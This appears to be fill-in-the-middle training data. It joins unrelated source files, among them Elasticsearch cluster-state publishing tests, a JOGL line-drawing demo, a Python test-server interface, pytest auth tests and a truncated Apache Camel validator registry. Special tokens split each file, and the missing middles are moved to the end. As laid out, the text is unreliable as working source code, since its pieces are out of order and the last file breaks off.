it's present in the previous cluster state DiscoveryNodes discoveryNodes = DiscoveryNodes.builder(nodeA.nodes()).put(nodeB.discoveryNode).build(); ClusterState previousClusterState = ClusterState.builder(CLUSTER_NAME).nodes(discoveryNodes).build(); ClusterState clusterState = ClusterState.builder(previousClusterState).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); assertSameStateFromFull(nodeB.clusterState, clusterState); // cluster state update - add block previousClusterState = clusterState; clusterState = ClusterState.builder(clusterState).blocks(ClusterBlocks.builder().addGlobalBlock(MetaData.CLUSTER_READ_ONLY_BLOCK)).incrementVersion().build(); ClusterState unserializableClusterState = new ClusterState(clusterState.version(), clusterState.stateUUID(), clusterState) { @Override public Diff<ClusterState> diff(ClusterState previousState) { return new Diff<ClusterState>() { @Override public ClusterState apply(ClusterState part) { fail("this diff shouldn't be applied"); return part; } @Override public void writeTo(StreamOutput out) throws IOException { throw new IOException("Simulated failure of diff serialization"); } }; } }; try { publishStateAndWait(nodeA.action, unserializableClusterState, previousClusterState); fail("cluster state published despite of diff errors"); } catch (Discovery.FailedToCommitClusterStateException e) { assertThat(e.getCause(), notNullValue()); assertThat(e.getCause().getMessage(), containsString("failed to serialize")); } } public void testFailToPublishWithLessThanMinMasterNodes() throws Exception { final int masterNodes = randomIntBetween(1, 10); MockNode master = createMockNode("master"); DiscoveryNodes.Builder discoveryNodesBuilder = DiscoveryNodes.builder().put(master.discoveryNode); for (int i = 1; i < masterNodes; i++) { discoveryNodesBuilder.put(createMockNode("node" + i).discoveryNode); } final int dataNodes = randomIntBetween(0, 5); final Settings dataSettings = Settings.builder().put(Node.NODE_MASTER_SETTING.getKey(), false).build(); for (int i = 0; i < dataNodes; i++) { discoveryNodesBuilder.put(createMockNode("data_" + i, dataSettings).discoveryNode); } discoveryNodesBuilder.localNodeId(master.discoveryNode.getId()).masterNodeId(master.discoveryNode.getId()); DiscoveryNodes discoveryNodes = discoveryNodesBuilder.build(); MetaData metaData = MetaData.EMPTY_META_DATA; ClusterState clusterState = ClusterState.builder(CLUSTER_NAME).metaData(metaData).nodes(discoveryNodes).build(); ClusterState previousState = master.clusterState; try { publishState(master.action, clusterState, previousState, masterNodes + randomIntBetween(1, 5)); fail("cluster state publishing didn't fail despite of not having enough nodes"); } catch (Discovery.FailedToCommitClusterStateException expected) { logger.debug("failed to publish as expected", expected); } } public void testPublishingWithSendingErrors() throws Exception { int goodNodes = randomIntBetween(2, 5); int errorNodes = randomIntBetween(1, 5); int timeOutNodes = randomBoolean() ? 0 : randomIntBetween(1, 5); // adding timeout nodes will force timeout errors final int numberOfMasterNodes = goodNodes + errorNodes + timeOutNodes + 1; // master final boolean expectingToCommit = randomBoolean(); Settings.Builder settings = Settings.builder(); // make sure we have a reasonable timeout if we expect to timeout, o.w. one that will make the test "hang"<|fim▁hole|> .put(DiscoverySettings.PUBLISH_TIMEOUT_SETTING.getKey(), "5ms"); // test is about committing MockNode master = createMockNode("master", settings.build()); // randomize things a bit int[] nodeTypes = new int[goodNodes + errorNodes + timeOutNodes]; for (int i = 0; i < goodNodes; i++) { nodeTypes[i] = 0; } for (int i = goodNodes; i < goodNodes + errorNodes; i++) { nodeTypes[i] = 1; } for (int i = goodNodes + errorNodes; i < nodeTypes.length; i++) { nodeTypes[i] = 2; } Collections.shuffle(Arrays.asList(nodeTypes), random()); DiscoveryNodes.Builder discoveryNodesBuilder = DiscoveryNodes.builder().put(master.discoveryNode); for (int i = 0; i < nodeTypes.length; i++) { final MockNode mockNode = createMockNode("node" + i); discoveryNodesBuilder.put(mockNode.discoveryNode); switch (nodeTypes[i]) { case 1: mockNode.action.errorOnSend.set(true); break; case 2: mockNode.action.timeoutOnSend.set(true); break; } } final int dataNodes = randomIntBetween(0, 3); // data nodes don't matter for (int i = 0; i < dataNodes; i++) { final MockNode mockNode = createMockNode("data_" + i, Settings.builder().put(Node.NODE_MASTER_SETTING.getKey(), false).build()); discoveryNodesBuilder.put(mockNode.discoveryNode); if (randomBoolean()) { // we really don't care - just chaos monkey mockNode.action.errorOnCommit.set(randomBoolean()); mockNode.action.errorOnSend.set(randomBoolean()); mockNode.action.timeoutOnCommit.set(randomBoolean()); mockNode.action.timeoutOnSend.set(randomBoolean()); } } final int minMasterNodes; final String expectedBehavior; if (expectingToCommit) { minMasterNodes = randomIntBetween(0, goodNodes + 1); // count master expectedBehavior = "succeed"; } else { minMasterNodes = randomIntBetween(goodNodes + 2, numberOfMasterNodes); // +2 because of master expectedBehavior = timeOutNodes > 0 ? "timeout" : "fail"; } logger.info("--> expecting commit to {}. good nodes [{}], errors [{}], timeouts [{}]. min_master_nodes [{}]", expectedBehavior, goodNodes + 1, errorNodes, timeOutNodes, minMasterNodes); discoveryNodesBuilder.localNodeId(master.discoveryNode.getId()).masterNodeId(master.discoveryNode.getId()); DiscoveryNodes discoveryNodes = discoveryNodesBuilder.build(); MetaData metaData = MetaData.EMPTY_META_DATA; ClusterState clusterState = ClusterState.builder(CLUSTER_NAME).metaData(metaData).nodes(discoveryNodes).build(); ClusterState previousState = master.clusterState; try { publishState(master.action, clusterState, previousState, minMasterNodes); if (expectingToCommit == false) { fail("cluster state publishing didn't fail despite of not have enough nodes"); } } catch (Discovery.FailedToCommitClusterStateException exception) { logger.debug("failed to publish as expected", exception); if (expectingToCommit) { throw exception; } assertThat(exception.getMessage(), containsString(timeOutNodes > 0 ? "timed out" : "failed")); } } public void testIncomingClusterStateValidation() throws Exception { MockNode node = createMockNode("node"); logger.info("--> testing acceptances of any master when having no master"); ClusterState state = ClusterState.builder(node.clusterState) .nodes(DiscoveryNodes.builder(node.nodes()).masterNodeId(randomAsciiOfLength(10))).incrementVersion().build(); node.action.validateIncomingState(state, null); // now set a master node node.clusterState = ClusterState.builder(node.clusterState).nodes(DiscoveryNodes.builder(node.nodes()).masterNodeId("master")).build(); logger.info("--> testing rejection of another master"); try { node.action.validateIncomingState(state, node.clusterState); fail("node accepted state from another master"); } catch (IllegalStateException OK) { assertThat(OK.toString(), containsString("cluster state from a different master than the current one, rejecting")); } logger.info("--> test state from the current master is accepted"); node.action.validateIncomingState(ClusterState.builder(node.clusterState) .nodes(DiscoveryNodes.builder(node.nodes()).masterNodeId("master")).incrementVersion().build(), node.clusterState); logger.info("--> testing rejection of another cluster name"); try { node.action.validateIncomingState(ClusterState.builder(new ClusterName(randomAsciiOfLength(10))).nodes(node.nodes()).build(), node.clusterState); fail("node accepted state with another cluster name"); } catch (IllegalStateException OK) { assertThat(OK.toString(), containsString("received state from a node that is not part of the cluster")); } logger.info("--> testing rejection of a cluster state with wrong local node"); try { state = ClusterState.builder(node.clusterState) .nodes(DiscoveryNodes.builder(node.nodes()).localNodeId("_non_existing_").build()) .incrementVersion().build(); node.action.validateIncomingState(state, node.clusterState); fail("node accepted state with non-existence local node"); } catch (IllegalStateException OK) { assertThat(OK.toString(), containsString("received state with a local node that does not match the current local node")); } try { MockNode otherNode = createMockNode("otherNode"); state = ClusterState.builder(node.clusterState).nodes( DiscoveryNodes.builder(node.nodes()).put(otherNode.discoveryNode).localNodeId(otherNode.discoveryNode.getId()).build() ).incrementVersion().build(); node.action.validateIncomingState(state, node.clusterState); fail("node accepted state with existent but wrong local node"); } catch (IllegalStateException OK) { assertThat(OK.toString(), containsString("received state with a local node that does not match the current local node")); } logger.info("--> testing acceptance of an old cluster state"); final ClusterState incomingState = node.clusterState; node.clusterState = ClusterState.builder(node.clusterState).incrementVersion().build(); final IllegalStateException e = expectThrows(IllegalStateException.class, () -> node.action.validateIncomingState(incomingState, node.clusterState)); final String message = String.format( Locale.ROOT, "rejecting cluster state version [%d] uuid [%s] received from [%s]", incomingState.version(), incomingState.stateUUID(), incomingState.nodes().getMasterNodeId() ); assertThat(e, hasToString("java.lang.IllegalStateException: " + message)); // an older version from a *new* master is also OK! ClusterState previousState = ClusterState.builder(node.clusterState).incrementVersion().build(); state = ClusterState.builder(node.clusterState) .nodes(DiscoveryNodes.builder(node.clusterState.nodes()).masterNodeId("_new_master_").build()) .build(); // remove the master of the node (but still have a previous cluster state with it)! node.resetMasterId(); node.action.validateIncomingState(state, previousState); } public void testOutOfOrderCommitMessages() throws Throwable { MockNode node = createMockNode("node").setAsMaster(); final CapturingTransportChannel channel = new CapturingTransportChannel(); List<ClusterState> states = new ArrayList<>(); final int numOfStates = scaledRandomIntBetween(3, 25); for (int i = 1; i <= numOfStates; i++) { states.add(ClusterState.builder(node.clusterState).version(i).stateUUID(ClusterState.UNKNOWN_UUID).build()); } final ClusterState finalState = states.get(numOfStates - 1); logger.info("--> publishing states"); for (ClusterState state : states) { node.action.handleIncomingClusterStateRequest( new BytesTransportRequest(PublishClusterStateAction.serializeFullClusterState(state, Version.CURRENT), Version.CURRENT), channel); assertThat(channel.response.get(), equalTo((TransportResponse) TransportResponse.Empty.INSTANCE)); assertThat(channel.error.get(), nullValue()); channel.clear(); } logger.info("--> committing states"); long largestVersionSeen = Long.MIN_VALUE; Randomness.shuffle(states); for (ClusterState state : states) { node.action.handleCommitRequest(new PublishClusterStateAction.CommitClusterStateRequest(state.stateUUID()), channel); if (largestVersionSeen < state.getVersion()) { assertThat(channel.response.get(), equalTo((TransportResponse) TransportResponse.Empty.INSTANCE)); if (channel.error.get() != null) { throw channel.error.get(); } largestVersionSeen = state.getVersion(); } else { // older cluster states will be rejected assertNotNull(channel.error.get()); assertThat(channel.error.get(), instanceOf(IllegalStateException.class)); } channel.clear(); } //now check the last state held assertSameState(node.clusterState, finalState); } /** * Tests that cluster is committed or times out. It should never be the case that we fail * an update due to a commit timeout, but it ends up being committed anyway */ public void testTimeoutOrCommit() throws Exception { Settings settings = Settings.builder() .put(DiscoverySettings.COMMIT_TIMEOUT_SETTING.getKey(), "1ms").build(); // short but so we will sometime commit sometime timeout MockNode master = createMockNode("master", settings); MockNode node = createMockNode("node", settings); ClusterState state = ClusterState.builder(master.clusterState) .nodes(DiscoveryNodes.builder(master.clusterState.nodes()).put(node.discoveryNode).masterNodeId(master.discoveryNode.getId())).build(); for (int i = 0; i < 10; i++) { state = ClusterState.builder(state).incrementVersion().build(); logger.debug("--> publishing version [{}], UUID [{}]", state.version(), state.stateUUID()); boolean success; try { publishState(master.action, state, master.clusterState, 2).await(1, TimeUnit.HOURS); success = true; } catch (Discovery.FailedToCommitClusterStateException OK) { success = false; } logger.debug("--> publishing [{}], verifying...", success ? "succeeded" : "failed"); if (success) { assertSameState(node.clusterState, state); } else { assertThat(node.clusterState.stateUUID(), not(equalTo(state.stateUUID()))); } } } private MetaData buildMetaDataForVersion(MetaData metaData, long version) { ImmutableOpenMap.Builder<String, IndexMetaData> indices = ImmutableOpenMap.builder(metaData.indices()); indices.put("test" + version, IndexMetaData.builder("test" + version).settings(Settings.builder().put(IndexMetaData.SETTING_VERSION_CREATED, Version.CURRENT)) .numberOfShards((int) version).numberOfReplicas(0).build()); return MetaData.builder(metaData) .transientSettings(Settings.builder().put("test", version).build()) .indices(indices.build()) .build(); } private void assertProperMetaDataForVersion(MetaData metaData, long version) { for (long i = 1; i <= version; i++) { assertThat(metaData.index("test" + i), notNullValue()); assertThat(metaData.index("test" + i).getNumberOfShards(), equalTo((int) i)); } assertThat(metaData.index("test" + (version + 1)), nullValue()); assertThat(metaData.transientSettings().get("test"), equalTo(Long.toString(version))); } public void publishStateAndWait(PublishClusterStateAction action, ClusterState state, ClusterState previousState) throws InterruptedException { publishState(action, state, previousState).await(1, TimeUnit.SECONDS); } public AssertingAckListener publishState(PublishClusterStateAction action, ClusterState state, ClusterState previousState) throws InterruptedException { final int minimumMasterNodes = randomIntBetween(-1, state.nodes().getMasterNodes().size()); return publishState(action, state, previousState, minimumMasterNodes); } public AssertingAckListener publishState(PublishClusterStateAction action, ClusterState state, ClusterState previousState, int minMasterNodes) throws InterruptedException { AssertingAckListener assertingAckListener = new AssertingAckListener(state.nodes().getSize() - 1); ClusterChangedEvent changedEvent = new ClusterChangedEvent("test update", state, previousState); action.publish(changedEvent, minMasterNodes, assertingAckListener); return assertingAckListener; } public static class AssertingAckListener implements Discovery.AckListener { private final List<Tuple<DiscoveryNode, Throwable>> errors = new CopyOnWriteArrayList<>(); private final AtomicBoolean timeoutOccurred = new AtomicBoolean(); private final CountDownLatch countDown; public AssertingAckListener(int nodeCount) { countDown = new CountDownLatch(nodeCount); } @Override public void onNodeAck(DiscoveryNode node, @Nullable Exception e) { if (e != null) { errors.add(new Tuple<>(node, e)); } countDown.countDown(); } @Override public void onTimeout() { timeoutOccurred.set(true); // Fast forward the counter - no reason to wait here long currentCount = countDown.getCount(); for (long i = 0; i < currentCount; i++) { countDown.countDown(); } } public void await(long timeout, TimeUnit unit) throws InterruptedException { assertThat(awaitErrors(timeout, unit), emptyIterable()); } public List<Tuple<DiscoveryNode, Throwable>> awaitErrors(long timeout, TimeUnit unit) throws InterruptedException { countDown.await(timeout, unit); assertFalse(timeoutOccurred.get()); return errors; } } void assertSameState(ClusterState actual, ClusterState expected) { assertThat(actual, notNullValue()); final String reason = "\n--> actual ClusterState: " + actual.prettyPrint() + "\n--> expected ClusterState:" + expected.prettyPrint(); assertThat("unequal UUIDs" + reason, actual.stateUUID(), equalTo(expected.stateUUID())); assertThat("unequal versions" + reason, actual.version(), equalTo(expected.version())); } void assertSameStateFromDiff(ClusterState actual, ClusterState expected) { assertSameState(actual, expected); assertTrue(actual.wasReadFromDiff()); } void assertSameStateFromFull(ClusterState actual, ClusterState expected) { assertSameState(actual, expected); assertFalse(actual.wasReadFromDiff()); } static class MockPublishAction extends PublishClusterStateAction { AtomicBoolean timeoutOnSend = new AtomicBoolean(); AtomicBoolean errorOnSend = new AtomicBoolean(); AtomicBoolean timeoutOnCommit = new AtomicBoolean(); AtomicBoolean errorOnCommit = new AtomicBoolean(); public MockPublishAction(Settings settings, TransportService transportService, Supplier<ClusterState> clusterStateSupplier, NewPendingClusterStateListener listener, DiscoverySettings discoverySettings, ClusterName clusterName) { super(settings, transportService, clusterStateSupplier, listener, discoverySettings, clusterName); } @Override protected void handleIncomingClusterStateRequest(BytesTransportRequest request, TransportChannel channel) throws IOException { if (errorOnSend.get()) { throw new ElasticsearchException("forced error on incoming cluster state"); } if (timeoutOnSend.get()) { return; } super.handleIncomingClusterStateRequest(request, channel); } @Override protected void handleCommitRequest(PublishClusterStateAction.CommitClusterStateRequest request, TransportChannel channel) { if (errorOnCommit.get()) { throw new ElasticsearchException("forced error on incoming commit"); } if (timeoutOnCommit.get()) { return; } super.handleCommitRequest(request, channel); } } static class CapturingTransportChannel implements TransportChannel { AtomicReference<TransportResponse> response = new AtomicReference<>(); AtomicReference<Throwable> error = new AtomicReference<>(); public void clear() { response.set(null); error.set(null); } @Override public String action() { return "_noop_"; } @Override public String getProfileName() { return "_noop_"; } @Override public void sendResponse(TransportResponse response) throws IOException { this.response.set(response); assertThat(error.get(), nullValue()); } @Override public void sendResponse(TransportResponse response, TransportResponseOptions options) throws IOException { this.response.set(response); assertThat(error.get(), nullValue()); } @Override public void sendResponse(Exception exception) throws IOException { this.error.set(exception); assertThat(response.get(), nullValue()); } @Override public long getRequestId() { return 0; } @Override public String getChannelType() { return "capturing"; } } }<|fim▁end|>
settings.put(DiscoverySettings.COMMIT_TIMEOUT_SETTING.getKey(), expectingToCommit == false && timeOutNodes > 0 ? "100ms" : "1h")
<|file_name|>LinesDemo.java<|end_file_name|><|fim▁begin|>import com.jogamp.opengl.*; import com.jogamp.opengl.awt.GLJPanel; import com.jogamp.opengl.fixedfunc.GLMatrixFunc; import com.jogamp.opengl.glu.GLU; import javax.swing.*; import java.awt.event.KeyEvent; import java.awt.event.KeyListener; import static com.jogamp.opengl.GL.GL_COLOR_BUFFER_BIT; import static com.jogamp.opengl.GL.GL_DEPTH_BUFFER_BIT; /** * This program demonstrates geometric primitives and their attributes. * * @author Kiet Le (Java port) Ported to JOGL 2.x by Claudio Eduardo Goes */ public class LinesDemo// // extends GLSkeleton<GLJPanel> implements GLEventListener, KeyListener { private GLU glu; // public static void main(String[] args) { // final GLCanvas glcanvas = createCanvas(); // // final JFrame frame = new JFrame("Basic Frame"); // // frame.getContentPane().add(glcanvas); // frame.setSize(frame.getContentPane().getPreferredSize()); // frame.setVisible(true); // // frame.repaint(); // } // public static GLCanvas createCanvas() { // final GLProfile profile = GLProfile.get(GLProfile.GL2); // GLCapabilities capabilities = new GLCapabilities(profile); // // final GLCanvas glcanvas = new GLCanvas(capabilities); // LinesDemo b = new LinesDemo(); // glcanvas.addGLEventListener(b); //// glcanvas.setSize(screenSize, screenSize); // // return glcanvas; // } // @Override protected GLJPanel createDrawable() {<|fim▁hole|> GLJPanel panel = new GLJPanel(caps); panel.addGLEventListener(this); panel.addKeyListener(this); return panel; } public void run() { GLJPanel demo = createDrawable(); JFrame.setDefaultLookAndFeelDecorated(true); JFrame frame = new JFrame("LinesDemo"); frame.setSize(400, 150); frame.setLocationRelativeTo(null); frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); frame.getContentPane().add(demo); frame.setVisible(true); demo.requestFocusInWindow(); } public static void main(String[] args) { new LinesDemo().run(); } public void init(GLAutoDrawable drawable) { GL2 gl = drawable.getGL().getGL2(); glu = new GLU(); // gl.glClearColor(0.0f, 0.0f, 0.0f, 0.0f); gl.glShadeModel(GL2.GL_FLAT); } public void display(GLAutoDrawable drawable) { GL2 gl = drawable.getGL().getGL2(); // int i; float coordinateSize = 300; // gl.glClear(GL.GL_COLOR_BUFFER_BIT); gl.glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT); // gl.glClearColor(1f, 1f, 1f, 1f); // gl.glMatrixMode(GLMatrixFunc.GL_PROJECTION); // gl.glLoadIdentity(); // gl.glOrtho(-coordinateSize, coordinateSize, -coordinateSize, coordinateSize, -1, 1); /* select white for all LinesDemo */ gl.glColor3f(1.0f, 1.0f, 1.0f); /* in 1st row, 3 LinesDemo, each with a different stipple */ gl.glEnable(GL2.GL_LINE_STIPPLE); gl.glEnable(GL2.GL_POINT_SMOOTH); gl.glBegin(GL2.GL_POINTS); gl.glPointSize(10e5f); gl.glVertex2i(200, 200); gl.glEnd(); gl.glDisable(GL2.GL_POINT_SMOOTH); gl.glLineStipple(1, (short) 0x0101); /* dotted */ drawOneLine(gl, 50.0f, 125.0f, 150.0f, 125.0f); gl.glLineStipple(1, (short) 0x00FF); /* dashed */ drawOneLine(gl, 150.0f, 125.0f, 250.0f, 125.0f); drawOneLine(gl, 150.0f, 125.0f, 250.0f, 200f); gl.glLineStipple(1, (short) 0x1C47); /* dash/dot/dash */ drawOneLine(gl, 250.0f, 125.0f, 350.0f, 125.0f); /* in 2nd row, 3 wide LinesDemo, each with different stipple */ gl.glLineWidth(5.0f); gl.glLineStipple(1, (short) 0x0101); /* dotted */ drawOneLine(gl, 50.0f, 100.0f, 150.0f, 100.f); gl.glLineStipple(1, (short) 0x00FF); /* dashed */ drawOneLine(gl, 150.0f, 100.0f, 250.0f, 100.0f); gl.glLineStipple(1, (short) 0x1C47); /* dash/dot/dash */ drawOneLine(gl, 250.0f, 100.0f, 350.0f, 100.0f); gl.glLineWidth(1.0f); /* in 3rd row, 6 LinesDemo, with dash/dot/dash stipple */ /* as part of a single connected line strip */ gl.glLineStipple(1, (short) 0x1C47); /* dash/dot/dash */ gl.glBegin(GL.GL_LINE_STRIP); for (i = 0; i < 7; i++) gl.glVertex2f(50.0f + ((float) i * 50.0f), 75.0f); gl.glEnd(); /* in 4th row, 6 independent LinesDemo with same stipple */ for (i = 0; i < 6; i++) { drawOneLine(gl, 50.0f + ((float) i * 50.0f), 50.0f, 50.0f + ((float) (i + 1) * 50.0f), 50.0f); } /* in 5th row, 1 line, with dash/dot/dash stipple */ /* and a stipple repeat factor of 5 */ gl.glLineStipple(5, (short) 0x1C47); /* dash/dot/dash */ drawOneLine(gl, 50.0f, 25.0f, 350.0f, 25.0f); gl.glDisable(GL2.GL_LINE_STIPPLE); gl.glFlush(); } public void reshape(GLAutoDrawable drawable, int x, int y, int w, int h) { GL2 gl = drawable.getGL().getGL2(); // gl.glViewport(0, 0, w, h); gl.glMatrixMode(GL2.GL_PROJECTION); gl.glLoadIdentity(); glu.gluOrtho2D(0.0, (double) w, 0.0, (double) h); } public void displayChanged(GLAutoDrawable drawable, boolean modeChanged, boolean deviceChanged) { } private void drawOneLine(GL2 gl, float x1, float y1, float x2, float y2) { // gl.glBegin(GL.GL_LINES); gl.glVertex2f((x1), (y1)); gl.glVertex2f((x2), (y2)); // gl.glEnd(); } public void keyTyped(KeyEvent key) { } public void keyPressed(KeyEvent key) { switch (key.getKeyCode()) { case KeyEvent.VK_ESCAPE: System.exit(0); break; default: break; } } public void keyReleased(KeyEvent key) { } public void dispose(GLAutoDrawable arg0) { } }<|fim▁end|>
GLCapabilities caps = new GLCapabilities(null); //
<|file_name|>TestServerInterface.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python # -*- coding: utf-8 -*- # ------------------------------------------------------------------- # Copyright (c) 2010-2019 Denis Machard # This file is part of the extensive automation project # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, # MA 02110-1301 USA # ------------------------------------------------------------------- import threading import time from ea.libs.NetLayerLib import ServerAgent as NetLayerLib from ea.libs.NetLayerLib import Messages as Messages from ea.libs.NetLayerLib import FifoCallBack as FifoCallBack from ea.serverinterfaces import EventServerInterface as ESI from ea.serverinterfaces import AgentServerInterface as ASI from ea.libs import Logger, Settings class TestServerInterface(Logger.ClassLogger, NetLayerLib.ServerAgent): def __init__(self, listeningAddress, agentName='TSI', context=None): """ Constructs TCP Server Inferface @param listeningAddress: @type listeningAddress: """ NetLayerLib.ServerAgent.__init__(self, listeningAddress=listeningAddress, agentName=agentName, keepAliveInterval=Settings.getInt( 'Network', 'keepalive-interval'), inactivityTimeout=Settings.getInt( 'Network', 'inactivity-timeout'), responseTimeout=Settings.getInt( 'Network', 'response-timeout'), selectTimeout=Settings.get( 'Network', 'select-timeout'), pickleVer=Settings.getInt( 'Network', 'pickle-version') ) self.context = context self.__mutex__ = threading.RLock() self.__fifoThread = None self.tests = {} # {'task-id': Boolean} # test register, with background running or not self.testsConnected = {} # all tests connected def startFifo(self): """ Start the fifo """ self.__fifoThread = FifoCallBack.FifoCallbackThread() self.__fifoThread.start() self.trace("TSI: fifo started.") def stopFifo(self): """ Stop the fifo """ self.__fifoThread.stop() self.__fifoThread.join() self.trace("TSI: fifo stopped.") def registerTest(self, id, background): """ Register the test on the server @param id: @type id: @param background: @type background: boolean """ try: self.tests[str(id)] = bool(background) self.trace( 'Test=%s registered, running in Background=%s' % (id, background)) except Exception as e: self.error(err=e) return False return True def onConnection(self, client): """ Called on connection of the test @param client: @type client: """ NetLayerLib.ServerAgent.onConnection(self, client) self.testsConnected[client.client_address] = {'connected-at': time.time(), 'probes': [], 'agents': []} self.trace('test is starting: %s' % str(client.client_address)) def onDisconnection(self, client): """ Called on disconnection of test @param client: @type client: """ NetLayerLib.ServerAgent.onDisconnection(self, client) self.trace('test is endding: %s' % str(client.client_address)) def resetRunningAgent(self, client): """ Reset all running agents used by the client passed as argument @param client: @type client: """ self.trace('Trying to cleanup active agents') for p in client['agents']: # we can reset only agent in ready state (ready message received) if 'agent-name' in p: agent = ASI.instance().getAgent(aname=p['agent-name']) if agent is not None: self.trace('Reset Agent=%s for Script=%s and Adapter=%s' % (p['agent-name'], p['script-id'], p['source-adapter'])) data = {'event': 'agent-reset', 'script_id': p['script-id'], 'source-adapter': p['source-adapter'], 'uuid': p['uuid']} ASI.instance().notify(client=agent['address'], data=data) def onRequest(self, client, tid, request): """ Reimplemented from ServerAgent Called on incoming request @param client: @type client: @param tid: @type tid: @param request: @type request: """ self.__mutex__.acquire() try: _body_ = request['body'] if client not in self.testsConnected: self.__mutex__.release() return self.testsConnected[client]['task-id'] = _body_['task-id'] # handle notify and save some statistics on the database if request['cmd'] == Messages.RSQ_NOTIFY: try: if _body_['event'] in ['agent-data', 'agent-notify', 'agent-init', 'agent-reset', 'agent-alive', 'agent-ready']: if _body_['event'] == 'agent-ready': self.testsConnected[client]['agents'].append( { 'agent-name': _body_['destination-agent'], 'script-id': _body_['script_id'], 'uuid': _body_['uuid'], 'source-adapter': _body_['source-adapter'] } ) ASI.instance().notifyAgent(client, tid, data=_body_) except Exception as e: self.error('unable to handle notify for agent: %s' % e) if _body_['event'] == 'testcase-stopped': # reset agents self.resetRunningAgent(client=self.testsConnected[client]) if _body_['task-id'] in self.tests: if not self.tests[_body_['task-id']]: # check connected time of the associated user and test # if connected-at of the user > connected-at of the test # then not necessary to send events userFounded = self.context.getUser( login=_body_['from']) if userFounded is not None: if client not in self.testsConnected: self.error( 'unknown test from %s' % str(client)) else: if userFounded['connected-at'] < self.testsConnected[client]['connected-at']: if _body_['channel-id']: ESI.instance().notify(body=('event', _body_), toAddress=_body_['channel-id']) else: ESI.instance().notify(body=('event', _body_)) else: self.error('test unknown: %s' % _body_['task-id']) if _body_['event'] == 'script-stopped': # reset agents self.resetRunningAgent(client=self.testsConnected[client]) if _body_['task-id'] in self.tests: self.tests.pop(_body_['task-id']) else: self.error('task-id unknown: %s' % _body_['task-id']) if client in self.testsConnected: self.testsConnected.pop(client) else: self.error('test unknown: %s' % str(client)) # handle requests elif request['cmd'] == Messages.RSQ_CMD: self.trace("cmd received: %s" % _body_['cmd']) if 'cmd' in _body_: # handle interact command if _body_['cmd'] == Messages.CMD_INTERACT: self.trace('interact called') if _body_['task-id'] in self.tests: if not self.tests[_body_['task-id']]: # check connected time of the associated user and test # if connected-at of the user > connected-at of # the test then not necessary to send events userFounded = self.context.getUser( login=_body_['from']) if userFounded is not None: if client not in self.testsConnected: self.error( 'unknown test from %s' % str(client)) else: if userFounded['connected-at'] < self.testsConnected[client]['connected-at']: self.__fifoThread.putItem(lambda: self.onInteract(client, tid, bodyReq=_body_, timeout=_body_['timeout'])) else: self.error('test unknown: %s' % _body_['task-id']) else: self.error('cmd unknown %s' % _body_['cmd']) rsp = {'cmd': _body_['cmd'], 'res': Messages.CMD_ERROR} NetLayerLib.ServerAgent.failed( self, client, tid, body=rsp) else: self.error('cmd is missing') # handle other request else: self.trace('%s received ' % request['cmd']) except Exception as e: self.error("unable to handle incoming request: %s" % e) self.__mutex__.release() def onInteract(self, client, tid, bodyReq, timeout=0.0): """ Called on interact """ inter = Interact(client, tid, bodyReq, timeout=timeout) testThread = threading.Thread(target=lambda: inter.run()) testThread.start() def trace(self, txt): """ Trace message """ if Settings.instance() is not None: if Settings.get('Trace', 'debug-level') == 'VERBOSE':<|fim▁hole|>class Interact(object): def __init__(self, client, tid, bodyReq, timeout=0.0): """ Interact object, not blocking """ self.client = client self.tid = tid self.bodyReq = bodyReq self.timeout = timeout def run(self): """ On run """ rsp = ESI.instance().interact(body=self.bodyReq, timeout=self.timeout) _data_ = {'cmd': Messages.CMD_INTERACT} if rsp is None: _data_['rsp'] = None else: _data_['rsp'] = rsp['body'] instance().ok(self.client, self.tid, body=_data_) TSI = None def instance(): """ Returns the singleton @return: @rtype: """ return TSI def initialize(listeningAddress, context): """ Instance creation @param listeningAddress: @type listeningAddress: """ global TSI TSI = TestServerInterface(listeningAddress=listeningAddress, context=context) TSI.startFifo() def finalize(): """ Destruction of the singleton """ global TSI if TSI: TSI.stopFifo() TSI.stopSA() TSI = None<|fim▁end|>
Logger.ClassLogger.trace(self, txt=txt)
<|file_name|>test_authentication.py<|end_file_name|><|fim▁begin|>import pytest from flask_httpauth import HTTPBasicAuth from kapsi_git_manager.kgm import app from kapsi_git_manager import authentication as auth password = "password" username = "username" <|fim▁hole|> def test_verify_correct_password(): """ with the credentials file try to verify correct password combination """ with app.app_context(): assert auth.verify_pw(username, password) == True def test_verify_wrong_password(): """ with the credentials file try to verify wrong password combination. """ with app.app_context(): assert auth.verify_pw("winnie", "pooh") == False<|fim▁end|>
def test_auth_simple(): """ this is the idiot test to check whether anything in you auth system works. """ assert isinstance(auth.auth, HTTPBasicAuth)
<|file_name|>DefaultValidatorRegistry.java<|end_file_name|><|fim▁begin|>/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.camel.impl.engine; import org.apache.camel.CamelContext; import org.apache.camel.spi.DataType; import org.apache.camel.spi.Validator; import org.apache.camel.spi.ValidatorRegistry; import org.apache.camel.support.CamelContextHelper; import org.apache.camel.support.service.ServiceHelper; import org.apache.camel.util.ObjectHelper; /** * Default implementation of {@link org.apache.camel.spi.ValidatorRegistry}. */ public class DefaultValidatorRegistry extends AbstractDynamicRegistry<ValidatorKey, Validator> implements ValidatorRegistry<ValidatorKey> { public DefaultValidatorRegistry(CamelContext context) { super(context, CamelContextHelper.getMaximumValidatorCacheSize(context)); } @Override public Validator resolveValidator(ValidatorKey key) { Validator answer = get(key); if (answer == null && ObjectHelper.isNotEmpty(key.getType().getName())) { answer = get(new 